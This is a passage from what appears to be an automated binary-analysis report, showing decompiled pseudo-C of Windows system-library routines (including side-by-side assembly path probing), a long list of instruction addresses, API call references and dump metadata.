								_t351 = _v36;
								_t419 = _a12;
								goto L60;
							}
							_t329 =  *(_t229 + 0x1c);
							__eflags = _t329;
							if(_t329 == 0) {
								L103:
								_v29 = 1;
								goto L14;
							} else {
								_t330 = E6B1E6600(_t329);
								_t351 = _v36;
								__eflags = _t330;
								if(_t330 == 0) {
									goto L14;
								}
								goto L103;
							}
						}
						_v30 = 1;
						_v29 = 1;
						L6B1EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
						_t351 =  *(_t336 + 0x48);
						_v36 = _t351;
						goto L14;
					} else {
						_t333 = 0;
						__eflags = 0;
						_t403 = _a20;
						while(1) {
							__eflags = _t333 - _t403;
							if(_t333 >= _t403) {
								goto L12;
							}
							__eflags =  *((short*)(_t349 + _t333 * 2));
							if( *((short*)(_t349 + _t333 * 2)) == 0) {
								goto L100;
							} else {
								_t333 = _t333 + 1;
								continue;
							}
						}
						goto L12;
					}
				}
			}

















































































































                                                                                                                            0x6b202f75
                                                                                                                            0x6b202f77
                                                                                                                            0x6b202f7c
                                                                                                                            0x6b202f87
                                                                                                                            0x6b202f88
                                                                                                                            0x6b202f8e
                                                                                                                            0x6b202f93
                                                                                                                            0x6b202f98
                                                                                                                            0x6b202f9c
                                                                                                                            0x6b202fa2
                                                                                                                            0x6b202fa9
                                                                                                                            0x6b202fb0
                                                                                                                            0x6b202fb4
                                                                                                                            0x6b202fb8
                                                                                                                            0x6b202fbd
                                                                                                                            0x6b245e6d
                                                                                                                            0x6b245e6d
                                                                                                                            0x6b2032f1
                                                                                                                            0x6b2032f4
                                                                                                                            0x6b203302
                                                                                                                            0x6b203302
                                                                                                                            0x6b202fc3
                                                                                                                            0x6b202fca
                                                                                                                            0x00000000
                                                                                                                            0x6b202fd0
                                                                                                                            0x6b202fd0
                                                                                                                            0x6b202fd5
                                                                                                                            0x6b202fd9
                                                                                                                            0x6b202fe0
                                                                                                                            0x00000000
                                                                                                                            0x6b202fef
                                                                                                                            0x6b202fef
                                                                                                                            0x6b202ff0
                                                                                                                            0x00000000
                                                                                                                            0x6b202ff0
                                                                                                                            0x6b202fe0
                                                                                                                            0x6b202ff5
                                                                                                                            0x6b202ff8
                                                                                                                            0x6b202ffa
                                                                                                                            0x6b203013
                                                                                                                            0x6b203019
                                                                                                                            0x6b20301c
                                                                                                                            0x6b20301f
                                                                                                                            0x6b203022
                                                                                                                            0x6b203025
                                                                                                                            0x6b20302c
                                                                                                                            0x6b203033
                                                                                                                            0x6b203036
                                                                                                                            0x6b203038
                                                                                                                            0x6b2034db
                                                                                                                            0x6b2034dd
                                                                                                                            0x6b2034e0
                                                                                                                            0x6b2034e3
                                                                                                                            0x6b20305a
                                                                                                                            0x6b20305a
                                                                                                                            0x6b203061
                                                                                                                            0x6b203063
                                                                                                                            0x6b203066
                                                                                                                            0x6b203068
                                                                                                                            0x6b20306b
                                                                                                                            0x6b20306d
                                                                                                                            0x6b2032cd
                                                                                                                            0x6b2032cd
                                                                                                                            0x6b2032d0
                                                                                                                            0x6b2032d2
                                                                                                                            0x6b203478
                                                                                                                            0x6b20347a
                                                                                                                            0x6b20347a
                                                                                                                            0x6b2032d8
                                                                                                                            0x6b2032da
                                                                                                                            0x6b203305
                                                                                                                            0x6b203309
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20330b
                                                                                                                            0x6b20330d
                                                                                                                            0x6b245f99
                                                                                                                            0x6b245f9f
                                                                                                                            0x6b245fa6
                                                                                                                            0x6b203365
                                                                                                                            0x6b203365
                                                                                                                            0x6b203368
                                                                                                                            0x6b20336a
                                                                                                                            0x6b203503
                                                                                                                            0x6b203513
                                                                                                                            0x6b20351b
                                                                                                                            0x6b203522
                                                                                                                            0x6b203527
                                                                                                                            0x6b20352a
                                                                                                                            0x6b20352d
                                                                                                                            0x6b20352f
                                                                                                                            0x6b20353d
                                                                                                                            0x6b203542
                                                                                                                            0x6b203542
                                                                                                                            0x6b203545
                                                                                                                            0x6b203547
                                                                                                                            0x6b20354f
                                                                                                                            0x6b203552
                                                                                                                            0x6b203555
                                                                                                                            0x6b20355b
                                                                                                                            0x6b203563
                                                                                                                            0x6b20356b
                                                                                                                            0x6b20356d
                                                                                                                            0x6b203570
                                                                                                                            0x6b203572
                                                                                                                            0x6b203578
                                                                                                                            0x6b20357b
                                                                                                                            0x6b20357e
                                                                                                                            0x00000000
                                                                                                                            0x6b203584
                                                                                                                            0x6b203584
                                                                                                                            0x6b20358a
                                                                                                                            0x6b20358d
                                                                                                                            0x6b203590
                                                                                                                            0x6b203596
                                                                                                                            0x00000000
                                                                                                                            0x6b203596
                                                                                                                            0x6b20357e
                                                                                                                            0x6b203377
                                                                                                                            0x6b203379
                                                                                                                            0x6b20337c
                                                                                                                            0x6b20337e
                                                                                                                            0x6b245f0c
                                                                                                                            0x6b245f0c
                                                                                                                            0x00000000
                                                                                                                            0x6b245f0c
                                                                                                                            0x6b203384
                                                                                                                            0x6b203386
                                                                                                                            0x6b245fad
                                                                                                                            0x6b20338c
                                                                                                                            0x6b20338e
                                                                                                                            0x6b203391
                                                                                                                            0x6b203391
                                                                                                                            0x6b203393
                                                                                                                            0x6b20339b
                                                                                                                            0x6b2033a0
                                                                                                                            0x6b2033a3
                                                                                                                            0x6b2033a3
                                                                                                                            0x6b2033a6
                                                                                                                            0x6b2033a9
                                                                                                                            0x6b2033af
                                                                                                                            0x6b2033b7
                                                                                                                            0x6b2033c2
                                                                                                                            0x6b2033c9
                                                                                                                            0x6b2033cc
                                                                                                                            0x6b2033cf
                                                                                                                            0x6b2033d5
                                                                                                                            0x6b2033dd
                                                                                                                            0x6b2033e8
                                                                                                                            0x6b2033ec
                                                                                                                            0x6b2033ef
                                                                                                                            0x6b2033f2
                                                                                                                            0x6b2033f4
                                                                                                                            0x6b245fb6
                                                                                                                            0x6b245fb9
                                                                                                                            0x6b2033fa
                                                                                                                            0x6b203402
                                                                                                                            0x6b20340a
                                                                                                                            0x6b20340d
                                                                                                                            0x6b20340f
                                                                                                                            0x6b20341d
                                                                                                                            0x6b203422
                                                                                                                            0x6b20340f
                                                                                                                            0x6b203425
                                                                                                                            0x6b203428
                                                                                                                            0x6b20342b
                                                                                                                            0x6b20342d
                                                                                                                            0x6b2034ee
                                                                                                                            0x6b203433
                                                                                                                            0x6b203433
                                                                                                                            0x6b203436
                                                                                                                            0x6b20343c
                                                                                                                            0x6b203442
                                                                                                                            0x6b203442
                                                                                                                            0x6b203442
                                                                                                                            0x6b203442
                                                                                                                            0x6b203448
                                                                                                                            0x6b20344c
                                                                                                                            0x6b203457
                                                                                                                            0x6b20345c
                                                                                                                            0x6b20345c
                                                                                                                            0x6b20346e
                                                                                                                            0x00000000
                                                                                                                            0x6b20346e
                                                                                                                            0x6b203313
                                                                                                                            0x6b203316
                                                                                                                            0x6b203316
                                                                                                                            0x6b203316
                                                                                                                            0x6b203319
                                                                                                                            0x6b20331c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203320
                                                                                                                            0x6b203320
                                                                                                                            0x6b203323
                                                                                                                            0x6b203326
                                                                                                                            0x6b203329
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20332b
                                                                                                                            0x6b20332b
                                                                                                                            0x6b203320
                                                                                                                            0x6b203333
                                                                                                                            0x6b203347
                                                                                                                            0x6b203349
                                                                                                                            0x6b203355
                                                                                                                            0x6b203355
                                                                                                                            0x6b203358
                                                                                                                            0x6b20335f
                                                                                                                            0x6b203362
                                                                                                                            0x00000000
                                                                                                                            0x6b2032dc
                                                                                                                            0x6b2032dc
                                                                                                                            0x6b2032dc
                                                                                                                            0x6b2032df
                                                                                                                            0x6b2032df
                                                                                                                            0x6b2032e2
                                                                                                                            0x6b2032e2
                                                                                                                            0x6b2032e9
                                                                                                                            0x6b2032ee
                                                                                                                            0x00000000
                                                                                                                            0x6b2032ee
                                                                                                                            0x6b2032da
                                                                                                                            0x6b203076
                                                                                                                            0x6b203080
                                                                                                                            0x6b203080
                                                                                                                            0x6b203080
                                                                                                                            0x6b203083
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203089
                                                                                                                            0x6b20308b
                                                                                                                            0x6b20308e
                                                                                                                            0x6b20308e
                                                                                                                            0x6b203090
                                                                                                                            0x6b203093
                                                                                                                            0x6b203093
                                                                                                                            0x6b203096
                                                                                                                            0x6b203099
                                                                                                                            0x6b20309c
                                                                                                                            0x6b20309f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2030a1
                                                                                                                            0x6b2030a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2030aa
                                                                                                                            0x6b2030ac
                                                                                                                            0x6b2030af
                                                                                                                            0x6b2030af
                                                                                                                            0x6b2030b2
                                                                                                                            0x6b2030b5
                                                                                                                            0x6b2030b7
                                                                                                                            0x6b2030c0
                                                                                                                            0x6b2030c0
                                                                                                                            0x6b2030c3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2030c5
                                                                                                                            0x6b2030c8
                                                                                                                            0x6b2030c8
                                                                                                                            0x6b2030cf
                                                                                                                            0x6b2030cf
                                                                                                                            0x6b2030d1
                                                                                                                            0x6b2030d3
                                                                                                                            0x6b2030d6
                                                                                                                            0x00000000
                                                                                                                            0x6b2030d6
                                                                                                                            0x6b2030d9
                                                                                                                            0x6b2030dc
                                                                                                                            0x6b2030df
                                                                                                                            0x6b2030e2
                                                                                                                            0x6b2030e4
                                                                                                                            0x6b2030e7
                                                                                                                            0x6b2030ea
                                                                                                                            0x6b2030ed
                                                                                                                            0x6b203153
                                                                                                                            0x6b203153
                                                                                                                            0x6b2030ef
                                                                                                                            0x6b2030f2
                                                                                                                            0x6b2030f5
                                                                                                                            0x6b2030f5
                                                                                                                            0x6b2030f7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2030fd
                                                                                                                            0x6b203100
                                                                                                                            0x6b203103
                                                                                                                            0x6b203106
                                                                                                                            0x6b203109
                                                                                                                            0x6b20310c
                                                                                                                            0x6b20310f
                                                                                                                            0x6b203112
                                                                                                                            0x6b203115
                                                                                                                            0x6b203117
                                                                                                                            0x6b203158
                                                                                                                            0x6b203158
                                                                                                                            0x6b20315b
                                                                                                                            0x6b203161
                                                                                                                            0x6b203164
                                                                                                                            0x6b203167
                                                                                                                            0x00000000
                                                                                                                            0x6b203167
                                                                                                                            0x6b203119
                                                                                                                            0x6b20311f
                                                                                                                            0x6b203122
                                                                                                                            0x6b20317a
                                                                                                                            0x6b20317d
                                                                                                                            0x6b245eb7
                                                                                                                            0x6b245eb9
                                                                                                                            0x6b245ec7
                                                                                                                            0x6b245eca
                                                                                                                            0x6b203183
                                                                                                                            0x6b203183
                                                                                                                            0x6b203183
                                                                                                                            0x6b20317d
                                                                                                                            0x6b203124
                                                                                                                            0x6b203127
                                                                                                                            0x6b20312a
                                                                                                                            0x6b20316c
                                                                                                                            0x6b20316f
                                                                                                                            0x6b245ef1
                                                                                                                            0x6b245ef3
                                                                                                                            0x6b245f01
                                                                                                                            0x6b245f04
                                                                                                                            0x6b203175
                                                                                                                            0x6b203175
                                                                                                                            0x6b203175
                                                                                                                            0x6b20316f
                                                                                                                            0x6b20312c
                                                                                                                            0x6b20312f
                                                                                                                            0x6b203131
                                                                                                                            0x00000000
                                                                                                                            0x6b203133
                                                                                                                            0x6b203133
                                                                                                                            0x6b203133
                                                                                                                            0x6b203135
                                                                                                                            0x6b203135
                                                                                                                            0x6b203137
                                                                                                                            0x6b203190
                                                                                                                            0x6b203192
                                                                                                                            0x6b203195
                                                                                                                            0x6b203195
                                                                                                                            0x6b203195
                                                                                                                            0x6b203198
                                                                                                                            0x6b20319b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2031a0
                                                                                                                            0x6b2031a0
                                                                                                                            0x6b2031a3
                                                                                                                            0x6b2031a6
                                                                                                                            0x6b2031a9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2031ab
                                                                                                                            0x6b2031ab
                                                                                                                            0x6b2031a0
                                                                                                                            0x6b2031b0
                                                                                                                            0x6b2031b3
                                                                                                                            0x6b2031b6
                                                                                                                            0x6b2031b9
                                                                                                                            0x6b2031bb
                                                                                                                            0x6b2034fc
                                                                                                                            0x6b2034fd
                                                                                                                            0x6b2034fe
                                                                                                                            0x6b2034b0
                                                                                                                            0x6b2034b0
                                                                                                                            0x6b2034b5
                                                                                                                            0x6b2034b8
                                                                                                                            0x6b2034b8
                                                                                                                            0x6b2034bc
                                                                                                                            0x6b2034ce
                                                                                                                            0x6b2034d3
                                                                                                                            0x6b2034d3
                                                                                                                            0x00000000
                                                                                                                            0x6b2034bc
                                                                                                                            0x6b2031c1
                                                                                                                            0x6b2031c4
                                                                                                                            0x6b2031c7
                                                                                                                            0x6b203482
                                                                                                                            0x6b203489
                                                                                                                            0x6b20348e
                                                                                                                            0x6b203494
                                                                                                                            0x6b203498
                                                                                                                            0x6b20349b
                                                                                                                            0x6b2034a1
                                                                                                                            0x6b2034a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2034aa
                                                                                                                            0x6b2034aa
                                                                                                                            0x6b2034ad
                                                                                                                            0x6b2034ae
                                                                                                                            0x6b2034af
                                                                                                                            0x00000000
                                                                                                                            0x6b2034af
                                                                                                                            0x6b2031cd
                                                                                                                            0x6b2031dc
                                                                                                                            0x6b2031e1
                                                                                                                            0x6b2031ef
                                                                                                                            0x6b2031f1
                                                                                                                            0x6b2031f4
                                                                                                                            0x6b2031f6
                                                                                                                            0x6b245f1f
                                                                                                                            0x6b245f28
                                                                                                                            0x6b245f2c
                                                                                                                            0x6b245f2f
                                                                                                                            0x6b245f3a
                                                                                                                            0x6b245f42
                                                                                                                            0x6b245f47
                                                                                                                            0x6b245f51
                                                                                                                            0x6b245f56
                                                                                                                            0x6b245f59
                                                                                                                            0x6b245f5d
                                                                                                                            0x6b245f5f
                                                                                                                            0x6b245f65
                                                                                                                            0x6b245f6b
                                                                                                                            0x6b245f71
                                                                                                                            0x6b245f71
                                                                                                                            0x6b245f71
                                                                                                                            0x6b245f71
                                                                                                                            0x6b245f77
                                                                                                                            0x6b245f7b
                                                                                                                            0x6b245f89
                                                                                                                            0x6b245f8e
                                                                                                                            0x6b245f8e
                                                                                                                            0x6b245f91
                                                                                                                            0x00000000
                                                                                                                            0x6b245f91
                                                                                                                            0x6b203201
                                                                                                                            0x6b203203
                                                                                                                            0x6b203206
                                                                                                                            0x6b203208
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203211
                                                                                                                            0x6b203218
                                                                                                                            0x6b20321e
                                                                                                                            0x6b203226
                                                                                                                            0x6b20322b
                                                                                                                            0x6b203233
                                                                                                                            0x6b20323b
                                                                                                                            0x6b20323f
                                                                                                                            0x6b203250
                                                                                                                            0x6b203255
                                                                                                                            0x6b203258
                                                                                                                            0x6b20325b
                                                                                                                            0x6b20325e
                                                                                                                            0x6b203260
                                                                                                                            0x6b245f18
                                                                                                                            0x6b203266
                                                                                                                            0x6b203266
                                                                                                                            0x6b203269
                                                                                                                            0x6b20326f
                                                                                                                            0x6b203275
                                                                                                                            0x6b203275
                                                                                                                            0x6b203275
                                                                                                                            0x6b203275
                                                                                                                            0x6b20327b
                                                                                                                            0x6b20327f
                                                                                                                            0x6b20328d
                                                                                                                            0x6b203292
                                                                                                                            0x6b203292
                                                                                                                            0x6b203295
                                                                                                                            0x6b203299
                                                                                                                            0x6b2032a4
                                                                                                                            0x6b2032a9
                                                                                                                            0x6b2032a9
                                                                                                                            0x6b2032bc
                                                                                                                            0x6b2032c1
                                                                                                                            0x6b2032c4
                                                                                                                            0x00000000
                                                                                                                            0x6b2032c4
                                                                                                                            0x6b203139
                                                                                                                            0x6b20313f
                                                                                                                            0x6b203142
                                                                                                                            0x6b20314b
                                                                                                                            0x6b20314b
                                                                                                                            0x6b203142
                                                                                                                            0x00000000
                                                                                                                            0x6b203139
                                                                                                                            0x6b203131
                                                                                                                            0x6b20318b
                                                                                                                            0x00000000
                                                                                                                            0x6b20318b
                                                                                                                            0x6b2032c7
                                                                                                                            0x6b2032c7
                                                                                                                            0x6b2032ca
                                                                                                                            0x00000000
                                                                                                                            0x6b2032ca
                                                                                                                            0x6b245e77
                                                                                                                            0x6b245e7a
                                                                                                                            0x6b245e7c
                                                                                                                            0x6b245e8f
                                                                                                                            0x6b245e8f
                                                                                                                            0x00000000
                                                                                                                            0x6b245e7e
                                                                                                                            0x6b245e7f
                                                                                                                            0x6b245e84
                                                                                                                            0x6b245e87
                                                                                                                            0x6b245e89
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b245e89
                                                                                                                            0x6b245e7c
                                                                                                                            0x6b20303e
                                                                                                                            0x6b203042
                                                                                                                            0x6b20304f
                                                                                                                            0x6b203054
                                                                                                                            0x6b203057
                                                                                                                            0x00000000
                                                                                                                            0x6b202ffc
                                                                                                                            0x6b202ffc
                                                                                                                            0x6b202ffc
                                                                                                                            0x6b202ffe
                                                                                                                            0x6b203001
                                                                                                                            0x6b203001
                                                                                                                            0x6b203003
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b203005
                                                                                                                            0x6b20300a
                                                                                                                            0x00000000
                                                                                                                            0x6b203010
                                                                                                                            0x6b203010
                                                                                                                            0x00000000
                                                                                                                            0x6b203010
                                                                                                                            0x6b20300a
                                                                                                                            0x00000000
                                                                                                                            0x6b203001
                                                                                                                            0x6b202ffa

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B20304F
                                                                                                                            • RtlSizeHeap.1105(?,00000000,00000000,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2031DC
                                                                                                                            • memcpy.1105(00000000,00000000,00000000,?,00000000,00000000,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B20321E
                                                                                                                            • memcpy.1105(00000000,6B2C79A0,00000000,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203233
                                                                                                                            • memcpy.1105(-00000002,00000000,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203250
                                                                                                                            • memset.1105(6B2C8220,00000000,00000234,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE), ref: 6B20328D
                                                                                                                            • RtlLeaveCriticalSection.1105(?,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2032A4
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE), ref: 6B2032BC
                                                                                                                            • RtlSizeHeap.1105(?,00000000,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203342
                                                                                                                            • memcpy.1105(00000000,00000000,00000000,?,00000000,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B20339B
                                                                                                                            • memcpy.1105(00000000,?,00000000,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2033B7
                                                                                                                            • memcpy.1105(-00000002,00000000,00000000,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2033DD
                                                                                                                            • memcpy.1105(-00000002,00000000,?,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE), ref: 6B203402
                                                                                                                            • memset.1105(6B2C8220,00000000,00000234,?,?,?,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000), ref: 6B20341D
                                                                                                                            • RtlLeaveCriticalSection.1105(?,?,?,?,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28), ref: 6B203457
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,?,?,?,?,?,0000003A,6B2C79A0,?,00000000), ref: 6B20346E
                                                                                                                            • memcpy.1105(00000000,6B2C79A0,00000000,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203489
                                                                                                                            • memmove.1105(6B202F61,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2034B0
                                                                                                                            • memset.1105(6B2C8220,00000000,00000234,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B2034CE
                                                                                                                            • memmove.1105(00000002,00000000,?,?,00000000,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203513
                                                                                                                            • memcpy.1105(00000000,?,00000000,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203522
                                                                                                                            • memset.1105(6B2C8220,00000000,00000234,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B20353D
                                                                                                                            • memcpy.1105(-00000002,00000000,00000000,?,?,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B203563
                                                                                                                            • RtlIsCriticalSectionLockedByThread.1105(00000000,?,0000003A,6B2C79A0,?,00000000,6B2217F0,6B2AFF28,000000FE,?,6B202F61), ref: 6B245E7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$CriticalHeapSectionmemset$FreeLeaveSizememmove$EnterLockedThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3971764801-0
                                                                                                                            • Opcode ID: 3c7154131b8e7893a5c90b178acbc04177d7dcdcbd2a80570a5795976897c85d
                                                                                                                            • Instruction ID: 8a4f1ca7c58fe31294ff54d746708a1e833b659672e105b559721a889b0263ab
                                                                                                                            • Opcode Fuzzy Hash: 3c7154131b8e7893a5c90b178acbc04177d7dcdcbd2a80570a5795976897c85d
                                                                                                                            • Instruction Fuzzy Hash: 7B328EB1E1025D9FCB25CF68C881FAEBBF1BF49704F144169E815AB391EB399901CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20CF6A, Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 321memorynativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E6B20CF6A(signed short* __edx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, signed int* _a20) {
				signed int _v12;
				char _v536;
				signed int _v537;
				signed int* _v544;
				signed int _v548;
				intOrPtr _v552;
				void* _v556;
				signed short _v560;
				signed short _v564;
				char _v568;
				signed short* _v572;
				signed short* _v576;
				intOrPtr _v580;
				signed short _v584;
				void* _v588;
				signed short _v592;
				void* _v596;
				intOrPtr _v600;
				signed short _v604;
				char _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				char* _v624;
				intOrPtr _v628;
				char _v632;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t101;
				void* _t103;
				signed short _t113;
				signed short _t116;
				void _t119;
				char _t129;
				intOrPtr _t131;
				void* _t137;
				intOrPtr _t145;
				short* _t147;
				signed int _t157;
				signed short* _t159;
				void* _t160;
				signed short* _t161;
				signed short _t165;
				intOrPtr _t166;
				signed short _t169;
				intOrPtr _t172;
				void* _t173;
				intOrPtr _t174;
				short _t175;
				void* _t181;
				void* _t189;
				void* _t190;
				signed short* _t192;
				void* _t193;
				void* _t194;
				void* _t197;
				signed short _t199;
				signed int _t200;

				_v12 =  *0x6b2cd360 ^ _t200;
				_t101 = _a8;
				_t166 = _a12;
				_v576 = __edx;
				_v584 = _a16;
				_t192 = _a4;
				_v544 = _a20;
				_v548 = _v548 & 0;
				_t189 = 0;
				_v560 = 0;
				_v537 = 0;
				_v568 = 0;
				_v564 = 0;
				_v588 = 0;
				_t187 = _v584;
				_v572 = _t192;
				_v580 = _t101;
				_v552 = _t166;
				_v556 = 0;
				if(_t187 != 0) {
					 *_t187 =  *_t187 & 0;
				}
				_t159 = _v576;
				if(_v544 != _t189) {
					 *_v544 =  *_v544 & _t189;
					_t166 = _v552;
				}
				if(_t159 == 0 || _t192 == 0 || _t101 == 0 || _t166 == 0 || _t187 == 0 || _v544 == _t189) {
					_push(_v544);
					_push(_t187);
					_push(_t166);
					_push(_t101);
					_push(_t192);
					_push(_t159);
					_push(0);
					E6B265720(0x33, 0, "SXS: %s() bad parameters\nSXS:  Flags:               0x%lx\nSXS:  Root:                %p\nSXS:  AssemblyDirectory:   %p\nSXS:  PreAllocatedString:  %p\nSXS:  DynamicString:       %p\nSXS:  StringUsed:          %p\nSXS:  OpenDirectoryHandle: %p\n", "RtlpProbeAssemblyStorageRootForAssembly");
					_t193 = 0xc000000d;
					goto L24;
				} else {
					_t169 =  *_t159 & 0x0000ffff;
					_t187 = _t169;
					if(_t169 != 0) {
						_t157 =  *(_t159[2] + (_t169 >> 1) * 2 - 2) & 0x0000ffff;
						_t181 = 0x5c;
						_t169 =  *_t159 & 0x0000ffff;
						if(_t157 != _t181) {
							if(_t157 != 0x2f) {
								_v537 = 1;
								_t187 = _t187 + 2;
							}
						}
					}
					_t113 = ( *_t192 & 0x0000ffff) + 4 + _t187;
					_v592 = _t113;
					if(_t113 > 0xfffe) {
						_push("SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.\n");
						_push(0);
						_push(0x33);
						E6B265720();
						_t193 = 0xc0000106;
						L26:
						if(_t189 != 0 && _t189 !=  &_v536) {
							E6B1DAD30(_t189);
						}
						L28:
						if(_v548 != 0) {
							_push(_v548);
							E6B2195D0();
						}
						_pop(_t190);
						_pop(_t194);
						_pop(_t160);
						return E6B21B640(_t193, _t160, _v12 ^ _t200, _t187, _t190, _t194);
					}
					if(_t113 > 0x208) {
						_t195 = _t113 & 0x0000ffff;
						_t189 = E6B1F3A1C(_t113 & 0x0000ffff);
						_v556 = _t189;
						if(_t189 != 0) {
							_t116 =  *_t159 & 0x0000ffff;
							goto L15;
						}
						E6B265720(0x33, _t115, "SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.\n", _t195);
						_t193 = 0xc0000017;
						goto L28;
					} else {
						_t189 =  &_v536;
						_t116 = _t169 & 0x0000ffff;
						_v556 = _t189;
						L15:
						memcpy(_t189, _t159[2], _t116 & 0x0000ffff);
						_t197 = _t189 + ( *_t159 & 0x0000ffff);
						if(_v537 != 0) {
							_t119 = 0x5c;
							 *_t197 = _t119;
							_t197 = _t197 + 2;
						}
						_t161 = _v572;
						memcpy(_t197, _t161[2],  *_t161 & 0x0000ffff);
						 *((short*)(_t197 + ( *_t161 & 0x0000ffff))) = 0;
						_t165 = (_v537 & 0x000000ff) + (_v537 & 0x000000ff) +  *_v572 +  *_v576;
						_v560 = _t165;
						if(E6B1E6A00(_t189,  &_v568, 0,  &_v608) == 0) {
							E6B265720(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _t189);
							_t193 = 0xc000003a;
							goto L26;
						} else {
							_t129 = _v608;
							_t187 = _v564;
							_v588 = _v564;
							if(_t129 != 0) {
								_v568 = _t129;
								_v564 = _v604;
								_t131 = _v600;
							} else {
								_t131 = 0;
							}
							_v628 = _t131;
							_push(0x21);
							_v624 =  &_v568;
							_push(3);
							_push( &_v640);
							_v632 = 0x18;
							_push( &_v632);
							_push(0x100020);
							_v620 = 0x40;
							_push( &_v548);
							_v616 = 0;
							_v612 = 0;
							_t193 = E6B219830();
							_t137 = _v596;
							if(_t137 != 0) {
								asm("lock xadd [eax], ecx");
								if(0xffffffff == 0) {
									_push( *((intOrPtr*)(_t137 + 4)));
									E6B2195D0();
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v596);
									_t189 = _v556;
									_t165 = _v560;
								}
							}
							if(_t193 < 0) {
								if(_t193 == 0xc000000f || _t193 == 0xc0000034 || _t193 == 0xc000003a) {
									_t193 = 0xc0150004;
								} else {
									_push(_t193);
									E6B265720(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _t189);
								}
								goto L24;
							} else {
								_t172 = _v580;
								_t199 = _v592;
								if(_t199 > ( *(_t172 + 2) & 0x0000ffff)) {
									if(_t189 ==  &_v536) {
										_t173 = E6B1F3A1C(_t199);
										 *(_v552 + 4) = _t173;
										if(_t173 != 0) {
											memcpy(_t173, _t189, _t165 & 0x0000ffff);
											_t145 = _v552;
											L52:
